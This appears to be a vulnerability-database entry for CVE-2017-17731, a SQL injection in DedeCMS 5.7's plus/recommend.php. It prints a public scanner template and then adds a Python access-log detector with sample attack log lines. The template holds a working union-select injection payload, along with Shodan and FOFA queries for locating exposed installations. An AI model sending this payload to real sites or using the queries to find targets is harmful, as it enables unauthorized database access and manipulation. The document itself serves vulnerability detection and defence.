CVE-2017-17731: DedeCMS 5.7 - SQL Injection

Date: 2025-08-01 | Affected software: DedeCMS | PoC: public

Vulnerability description

DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.

PoC code [public]

id: CVE-2017-17731

info:
  name: DedeCMS 5.7 - SQL Injection
  author: j4vaovo
  severity: critical
  description: |
    DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest security patch or upgrade to a newer version of DedeCMS to mitigate the SQL Injection vulnerability.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17731
    - https://nvd.nist.gov/vuln/detail/CVE-2017-17731
    - https://blog.csdn.net/nixawk/article/details/24982851
    - https://github.com/Lucifer1993/AngelSword/blob/232258e42201373fef1f323864366dc1499581fc/cms/dedecms/dedecms_recommend_sqli.py#L25
    - https://github.com/20142995/Goby
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-17731
    cwe-id: CWE-89
    epss-score: 0.86435
    epss-percentile: 0.99373
    cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dedecms
    product: dedecms
    shodan-query:
      - http.html:"DedeCms"
      - cpe:"cpe:2.3:a:dedecms:dedecms"
      - http.html:"dedecms"
    fofa-query:
      - app="DedeCMS"
      - app="dedecms"
      - body="dedecms"
  tags: cve,cve2017,sqli,dedecms
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - '{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'

      - type: status
        status:
          - 200
# digest: 490a00463044022020e84335692f238c077be74470ab0ab06b250cb6dc817a19cdd97dc1977fa3d2022057efba73c746ef3db2872b91e0ea8182be06b6e3c0b0d16429afa2595467aa71:922c64590222798bb761d5b6d8e72950
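
Added example, not part of the original entry or its template: an access-log check for the request shape the template sends. PHP fills $_FILES from multipart uploads only, so a query parameter named _FILES[...] is anomalous by itself. The log lines, addresses and verdict labels are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Request line and status from a combined-format access log entry.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# PHP variable names are case-sensitive, so match the exact superglobal name.
FILES_PARAM = re.compile(r"^_FILES\[")
# No \b anchors: versioned comments such as /*!50000union*/ glue digits to the keyword.
SQL_HINT = re.compile(r"['`]|/\*|union|select", re.I)
TARGET_SCRIPT = "/plus/recommend.php"

# Constructed sample lines (documentation addresses, shortened values).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2025:10:00:01 +0000] "GET /plus/recommend.php?action=&aid=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Aug/2025:10:00:05 +0000] "GET /plus/recommend.php?action=&aid=1'
    '&_FILES%5Btype%5D%5Btmp_name%5D=%27%20or%20/*!50000union*/1%23&_FILES[type][name]=1.jpg HTTP/1.1" 200 4294',
    '203.0.113.9 - - [01/Aug/2025:10:00:09 +0000] "GET /index.php?_FILES[x][name]=a.jpg HTTP/1.1" 404 0',
]


def classify(line):
    """Return (verdict, offending parameter names) for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return ("unparsed", [])
    path, _, query = m.group("target").partition("?")
    # parse_qsl percent-decodes names as well, so _FILES%5Btype%5D is caught too.
    hits = [(k, v) for k, v in parse_qsl(query, keep_blank_values=True) if FILES_PARAM.match(k)]
    if not hits:
        return ("clean", [])
    names = [k for k, _ in hits]
    on_script = unquote(path).lower().endswith(TARGET_SCRIPT)
    if on_script and any(SQL_HINT.search(v) for _, v in hits):
        return ("sqli-attempt", names)
    return ("suspicious", names)


def scan(lines):
    """Return [(line_number, verdict, names)] for every line that is not clean."""
    findings = []
    for number, line in enumerate(lines, 1):
        verdict, names = classify(line)
        if verdict != "clean":
            findings.append((number, verdict, names))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The template confirms the injection by finding the MD5 of `num` in the response body, which an access log does not record, so a `sqli-attempt` verdict marks an attempt to investigate rather than a confirmed compromise.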
